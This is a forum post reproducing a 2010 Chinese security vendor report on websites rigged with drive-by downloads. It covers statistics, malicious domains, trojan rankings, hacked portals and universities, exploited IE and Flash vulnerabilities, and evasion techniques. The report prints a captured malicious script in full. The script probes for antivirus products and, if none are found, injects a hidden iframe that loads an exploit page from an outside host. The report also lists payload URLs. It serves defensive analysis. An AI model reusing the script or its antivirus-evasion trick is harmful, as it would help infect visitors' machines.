找回密码
 注册创意安天

2010年上半年中国大陆地区网络安全报告

[复制链接]
发表于 2010-7-6 14:33 | 显示全部楼层 |阅读模式
( PDF报告下载 ) {PDF文档阅读软件下载}
1、2010年上半年挂马数据统计·挂马网站统计

    2010年上半年共拦截恶意网站4,613,000个,以4月拦截最多784,000个。因为挂马网站访问量的大小会直接导致中木马机率的高低,所以选择流量大的网站挂马已成为新的趋势。在统计中可以看出,2月份挂马数量增长明显,在4月高峰期后,渐渐表现出回落趋势。


图1 2010年上半年共拦截恶意网站

·恶意网站的地域分布
    2010年上半年,纵观中国大陆地区恶意网站的地域分布,经统计大部分来自于广东省,占总比例的11%;其次是江苏、湖南等地,也占了不少份额;北京,由于特殊的地位,紧随其后,占了总比例的6%;其他省、直辖市占了总比例的21%。


图2 恶意网站的地域分布

·恶意网站统计    2010年上半年,对截获的恶意网站统计来看,顶级域名以“.org”为主。在统计恶意域名Top10时,发现40%的恶意网站集中在我国的广东地区。
排名

恶意域名

1

annil.8866.org

2

a.ppmmoo.cn

3

vod123.8866.org

4

cptiandi.com

5

web.nba1001.net

6

ferrari10.7766.org

7

ada.bij.pl

8

aa44.qq66.in

9

rezervzv.ru

10

aan.osa.pl

表格1 恶意网站统计

    恶意域名有着时效性,挂马者会经常更换恶意域名,为了防止安全厂商将其收录为黑名单后,以减小网马的传播范围;或是有关机关将其封杀,以阻断它的传播。·域名利用情况
    根据2010年上半年来对挂马网站域名类型统计来看,“.org”域名被黑客利用最多,居其首位,“.cn”其次。恶意网站的存活时间是有限的,黑客为了降低成本,会有选择性的选择价格低廉的域名。


图3 恶意网域名类型对比

·网马漏洞利用情况
    纵观2010年上半年网马漏洞利用方面,与2009年相比有较大变化,由集成网马转向了利用单一漏洞挂马,为了增加挂马的成功率,老漏洞很少出现在挂马利用上,而且更新迭代较快。“极光”漏洞(MS10-002)的出现,受到挂马者的青睐,不过也只是风靡一时,当MS10-018(CVE-2010-0806)出现时,又使挂马者的目光转向了它,也是当前挂马者主要利用的漏洞。


图4 网马利用漏洞对比图

·利用网马传播的木马

    木马传播的途径有很多,可以利用U盘,电子邮件、通讯软件等途径进行传播,然而利用最多而且最有效的就是利用挂马网站进行传播;经统计,2010年上半年通过挂马网站传播的木马,主要以网游盗号类木马居多,其次是木马下载器、后门类病毒程序,可见挂马者目的性很强,纯粹为了金钱利益。

排名

病毒名

1

Trojan/Win32.OnLineGames.uszg[GameThief]

2

Trojan/Win32.OnLineGames.bkzl[GameThief]

3

Trojan/Win32.OnLineGames.bkxt[GameThief]

4

Trojan/Win32.OnLineGames.bnkb[GameThief]

5

Trojan/Win32.WOW.ipf[GameThief]        

6

Trojan/Win32.OnLineGames.bnjy[GameThief]

7

Trojan/Win32.Geral.hwx[Downloader]

8

Trojan/Win32.QQPass.ufz[Stealer]

9

Trojan/Win32.VB.efc[Clicker]

10

Backdoor/Win32.Agent.tnr

表格 2木马排名
·挂马网站分类对比
    挂马在不同类的网站占比也是不同的,在2010年上半年被挂马网站分类对比图中列出了各个不同类别网站的占比。其中以娱乐网站占比最多为25%,游戏网站占比17%排在第二位。这两类网站人们关注范围大,点击次数多,直接促使网马的占比提升。


图5 挂马网站分类对比

·2010年上半年大站挂马
    下面是2010年上半年最具有影响力的挂马网站,知名网站的流量大,正是挂马者最看重的原因。一旦对知名网站挂马成功,那么木马的传播量与传播速度则会相当惊人。以下是上半年大站挂马排名TOP10。
发现时间

被挂马网站

链接


2010-01-20

博客大巴

http://ndyle.blogbus.com/

2010-02-08

北方新闻网

http://www.northnews.cn/news/2010/201001/2010-01-31/249081.html

2010-03-22

互联星空

http://mag2.js.vnet.cn/html/instas/2362.html

2010-03-31

互联网实验室

http://www.chinalabs.com/

2010-04-19

手机中国

http://v.cnmo.com/commend/13/12752.html

2010-04-21

IT168

http://diybbs.it168.com/thread-58888-1-1.html

2010-05-18

中国电视体育联播平台

http://www.cspn.cn/templates/en_ad/html/137.html

2010-05-20

58同城

http://zixun.58.com/aoyun/html_list/?wow/

2010-05-31

猫扑

http://bbs.game.mop.com/index.php

2010-06-29

扬子晚报

http://www.yangtse.com/bbs/templates/colors/1234.html
表格 3被挂马网站发现时间 ·2010年上半年高校挂马
    芸芸学子在准备着每年一次高考的同时,也会光顾各大高校网站了解更多的信息从而选择报考,经统计,每年的高考前后也是一年中高校挂马最多的时候,下面是上半年高校挂马排名TOP10。
发现时间

被挂马网站

链接


2010-01-29

北京工业大学

http://yjsgl.bjut.edu.cn/bgdadmin/

2010-02-25

山西师范大学

http://www.sxnu.edu.cn./change/dzjg/tw/index.asp

2010-03-09

福州大学

http://student.fzu.edu.cn/html/wow/1376.html

2010-04-29


北京外国语大学

http://hq.bfsu.edu.cn/Index.html

2010-04-29

清华大学

http://thsports.tsinghua.edu.cn/

2010-04-29

复旦大学

http://www.optics.fudan.edu.cn/news/wow/1588.html

2010-05-28

扬州大学

http://jpkc.yzu.edu.cn/course/dwcrb/0102kcts.asp

2010-06-23

武汉大学

http://sim.whu.edu.cn/diaocha/image/cdk/2103.html

2010-06-30

北京师范大学

http://erm.bnu.edu.cn/

2010-06-30

中国人民大学

http://xcb.ruc.edu.cn/xcontent.asp?id=169
表格 4被挂马网站发现时间
2、2010年上半年出现的网马及事件追踪MS10-002漏洞    2010年1月14日,微软官方发布安全通报979352(CVE-2010-0249),代号为“Aurora”,此漏洞涉及到IE6、IE7、IE8,21日微软在安全公告上发布MS10-002,并为此漏洞提供了升级补丁程序;网马溢出代码曝光之后,MS10-002漏洞被挂马者广泛应用于挂马中。
典型案例:2010年1月20日,搜捕论坛(http://bbs.51sobu.com/)被挂马,被黑客利用的便是MS10-002漏洞。

MS10-018漏洞    2010年3月9日,微软官方发布安全通报981374(CVE-2010-0806),此漏洞涉及到IE6、IE7、IE8,30日微软在安全公告上发布MS10-002,并为此漏洞提供了升级补丁程序;网马溢出代码曝光之后,MS10-018漏洞被挂马者广泛应用于挂马中,也基本取代了MS10-002的在网马中地位。
典型案例:2010年3月24日,沈阳公安交警信息网(http://www.sygajj.gov.cn/)被挂马,黑客利用的便是MS10-018漏洞。

Adobe Flash Player、Adobe Reader 、Acrobat漏洞
    2010年6月4日,Adobe公司的Adobe Flash Player、Adobe Reader 、Acrobat爆出0day漏洞,CVE编号为CVE-2010-1297,Adobe已经确定Adobe Flash Player 10.0.45.2或更早的版本存在漏洞,安装Adobe Reader and Acrobat 9.x版本的Windows,Macintosh 和UNIX操作系统中的authplay.dll组件存在问题。此漏洞可能引起崩溃并且允许远程攻击者控制受影响的系统。
典型案例:2010年6月10日,长安大学(http://roadtunnel.chd.edu.cn/dede/coimg/100.html)被挂马,黑客利用的便是Adobe Flash Player漏洞(CVE-2010-1297)。

3.网马反检测手段
    杀毒软件在与网马不断较量中逐渐成熟,挂马者也从未停歇前进的步伐,他们不断挖掘新的漏洞,使用新的反检测手段,以逃避杀软的查杀。网马反检测除了普遍的加密、变形、混淆技术采用了挂马者认为更有效的手段来实践于挂马。本节从以下3个方面介绍下目前网马流行的反检测手段。·反侦察
    挂马者为了防止杀软对网马检测,在代码中加入了对相关安全产品的检测,如果发现有这些安全产品,便不执行网马代码,以使自身存活的周期更长。
案例分析:
    在2月初,捕获的很多挂马网站都会调用这个恶意页面(http://bbs.xcdx169.net/include/log.js?YPWRUTWT),从下面代码中我们可以看出,黑客利用RES协议来判断用户的主机是否存在360安全卫士、瑞星两个安全软件的相关资源文件,以此判断用户主机是否已经安装360安全卫士和瑞星,如果存在,那么将不执行最终的网马页面。
http://bbs.xcdx169.net/include/log.js?YPWRUTWT”页面截图:


图9 页面截图


http://bbs.xcdx169.net/include/log.js?YPWRUTWT”页面完整代码:

function panduan()
{
jc_list = ['res://C:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://D:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://C:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://D:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://e:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://f:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://e:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://f:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://C:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://D:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://E:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://F:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://C:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://D:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://E:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://F:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172'];
for ( i= 0; i<jc_list.length; i++)
{
ischeck = 1;
x = new Image();
x.src = "";
x.onerror = function()
{
ischeck = 0;
}
x.src = jc_list;
if (ischeck == 1)
return 1;
delete x;
}
return 0;
}
if(!panduan())
{
document.writeln("<iframe src=http:\/\/game.hsw.cn\/plus\/img\/logo.html?人06 width=100 height=0><\/iframe>");
var a3742tf="51la";var a3742pu="";var a3742pf="51la";
var a3742su=window.location;var a3742sf=document.referrer;var a3742of="";
var a3742op="";var a3742ops=1;var a3742ot=1;var a3742d=new Date();
var a3742color="";if (navigator.appName=="Netscape"){a3742color=screen.pixelDepth;} else {a3742color=screen.colorDepth;}
try{a3742tf=top.document.referrer;}catch(e){}
try{a3742pu =window.parent.location;}catch(e){}
try{a3742pf=window.parent.document.referrer;}catch(e){}
try{a3742ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
a3742ops=(a3742ops==null)?1: (parseInt(unescape((a3742ops)[2]))+1);var a3742oe =new Date();
a3742oe.setTime(a3742oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3742ops+ ";path=/;expires=
"+a3742oe.toGMTString();a3742ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
if(a3742ot==null){a3742ot=1;}else{a3742ot=parseInt(unescape((a3742ot)[2]));
a3742ot=(a3742ops==1)?(a3742ot+1)a3742ot);}a3742oe.setTime(a3742oe.getTime()+365*24*60*60*1000);
document.cookie="AJSTAT_ok_times="+a3742ot+";path=/;expires="+a3742oe.toGMTString();}catch(e){}
a3742of=a3742sf;if(a3742pf!=="51la"){a3742of=a3742pf;}
if(a3742tf!=="51la"){a3742of=a3742tf;}a3742op=a3742pu;try{lainframe}catch(e){a3742op=a3742su;}
document.write('<img style="width:0px;height:0px" src="http://web2.51.la:82/go.asp?svid=4&id=3483742&tpages=
'+a3742ops+'&ttimes='+a3742ot+'&tzone='+(0-a3742d.getTimezoneOffset()/60)+'&tcolor='+a3742color+'&sSize='+screen.width+'
,'+screen.height+'&referrer='+escape(a3742of)+'&vpage='+escape(a3742op)+'" />');

} ·网马中含有“木马”解密代码    网马分析人员大多都有一个习惯,就是在剥茧抽丝中,把藏匿于网马中的木马链接找到,下载木马后对其进行分析,然而挂马者为了防止这一点,首先加密了木马,这样即使下载了木马,没有密钥同样无法运行木马,却在网马shellcode中包含解密代码,只有在执行网马时才能触发木马。
案例分析:
    2010年5月31日,安天实验室发现,猫扑·游戏频道综合社区(http://bbs.game.mop.com/index.php)被挂马,利用的是MS10-018漏洞,木马链接为(http://yyyyy.crabdance.com/wbem/image/system.exe),然而单独下载“system.exe”后运行无效后,对此进行了深入分析。     我们知道PE文件头16进制表示为4D 5A,我们用UE以16进制打开“system.exe”,可以看出此文件的前两位D8 CF,用D8异或4D、 CF异或5A就得到了密钥95,由此我们得知此病毒文件是通过异或95进行加密的;然而加密手段有很多,异或只是其中的一种,具体情况要具体分析。


图 11具体分析图

4. 搜索引擎已成为网马传播的主要途径    网马的传播途径有很多,如电子邮件、即时通讯工具、社会工程学等,然而在网络发展的今天,人们在遇到问题时,往往是更依赖于网络通过搜索引擎去寻求答案,黑客便利用这点,首先入侵到一些知名网站,拿到权限后,把一些人群感兴趣的文章(隐藏着恶意代码)上传到该网站上,这样搜索引擎会优先录入这些页面,当这一些人通过关键字搜索时,当点击含有这些关键字的恶意页面,当含有漏洞的系统触发这些恶意代码时,就成为了任人摆布的“肉鸡”。因此,搜索引擎已成为网马传播的主要途径。
案例分析:
    2010年6月29日,安天实验室发现,扬子晚报网被黑客入侵,并上传大量与网络游戏相关并含有恶意代码的页面,我们拿其中一挂马页面进行分析,(http://www.yangtse.com/bbs/templates/colors/1252.html),截图如下:


图 12 截图

    通过Google搜索引擎搜索关键字 “wowdz手法”(该挂马页面的标题),搜索到的结果有86,800条,对第一页给出每个链接逐个进行分析,含有恶意代码的链接已经用红色方框注明,可以看出除了“百度知道”,其余全是挂马页面。


图13 挂马页面


    总结:这只是众多利用搜索引擎传播网马的案例之一,如果用户通过搜索引擎搜索关键字时,多去一些与之相关并且可信任的网站,例如你搜索游戏的关键字,却搜索出一个政府域名(.gov)的链接,这时候你就要考虑一下了。5. 搜索引擎已成为网马传播的主要途径
    “挂马网站”为黑色产业链带来巨大的利润,面对这个网络公敌,虽然不乏有好的安全产品出现,但仍旧不能有效阻止它们的传播。在2010年下半年,预计在挂马数量上只增不减。
    挂马团伙依旧会不断挖掘新的漏洞,利用新的防检测手段逃避杀软的查杀;每一次热点事件出现时,也是网马趁机传播的时候,黑客会继续跟踪新的热点事件,并选择流量大的网站进行挂马,以促使网马广泛的传播。
    全世界为之关注的“2010年南非足球世界杯”已经开始了,在网上查找相关信息的时候,请不要去那些不可信任的小网站,多去一些可信任的大网站;请及时为系统打补丁,当发现有最新版本的第三方应用软件时,请升级到最新版本,这样会给自身系统多一份安全保障。
发表于 2010-8-10 21:31 | 显示全部楼层
不错,顶一下
回复

使用道具 举报

发表于 2010-10-28 12:03 | 显示全部楼层
本人已阅!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

Archiver|手机版|小黑屋|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-12-23 13:08

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表